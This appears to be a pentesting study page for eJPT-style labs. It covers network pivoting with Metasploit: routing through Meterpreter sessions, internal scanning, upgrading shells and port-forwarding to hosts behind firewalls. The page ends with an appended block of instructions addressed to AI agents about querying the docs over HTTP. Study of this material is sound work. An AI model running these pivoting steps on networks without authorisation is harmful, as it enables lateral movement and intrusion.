# 💻Networking

## Routing

### get route table:

```
ip route
route -n
```

### add a route

```
ip route add <net_id>/<mask> via <net_getaway>
```

meterpreter:

```
route add x.x.x.0/24 1 (this is the session you want this to add to)
route list
//You should see the route now.

//Then go back into your session by:
sessions -i 1
```

{% embed url="<https://www.offensive-security.com/metasploit-unleashed/pivoting>" %}
I followed this guide then portfwd add for whatever port I found
{% endembed %}

{% embed url="<https://www.youtube.com/watch?v=MeSql-3aOsM>" %}

```
use auxilary/scanner/discovery/udp_prob
set RHOSTS <target_ip>

route add <target_ip>/24 1  //routing inside the seesion so it will send these udp probs following this routing rule
route print

set THREADS 20  //20 hosts at the same time
run
```

{% embed url="<https://www.youtube.com/watch?v=Zu8SixuIMww>" %}

```bash
inside a meterpreter session:

meterpreter> run autoroute -s <new_ip_found_inside_target>/24
meterpreter > run autoroute -p //print all routes

//now the routing is down inside a metasploite so lets scan the network using it
background
use auxiliary/scanner/netbios/nbname   //for win env

set RHOSTS <new_net_ip>/24
run

// found a new ip time for port scanner for the new target
 use auxiliary/scanner/portscan/tcp
 set RHOSTS <new_TRAGET_Discovered_using_first_target_IP>
 set THREADS 5
 run
 
//then use another auxiliary to discover the ver for the specified deamon found
//ex:ftp

use auxiliary/scanner/ftp/ftp_version
st RHOSTS <new_TRAGET_Discovered_IP>
run

//then you can search for an exploit for that ftp banner
//then you would pobably get shell you can use to_meterpreter module

use post/multi/manage/shell_to_meterpreter
set LHOST <first_target_in_new_net_IP>
set session <shell_session_id>
run

//now you have a new session it's the meterpreter
session -i <new_meter_sessoin>

//then repeat the same thing with the new session
meterpreter> autoroute -s <2nd_target_ip_net>/24
background

route print

//assuming the 2nd target connected to
// a 3rd target that runs ion TCP:80
//you found the 3rd target 
//by repeating steps above inside the 2nd target.

session -i <2nd_target_sesssion_id>
meterpreter > portfwd add -l 8888 -p 80 <third_target_ip>

//now you device can connect to 3rd target webapp 
//(whichs was behind 3 FireWalls) 

now inside your machine:
netstat -altp

will give you will see 0.0.0.0:8888 listening on ruby
```

{% embed url="<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/manage/shell_to_meterpreter.md>" %}
upgrade a shell to meterperter over pivot
{% endembed %}

{% embed url="<https://www.jaacostan.com/2021/06/pivoting-via-meterpreter-metasploit-v6x.html>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mo-ela.gitbook.io/shifrablog/pentesting/ejpt/networking.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.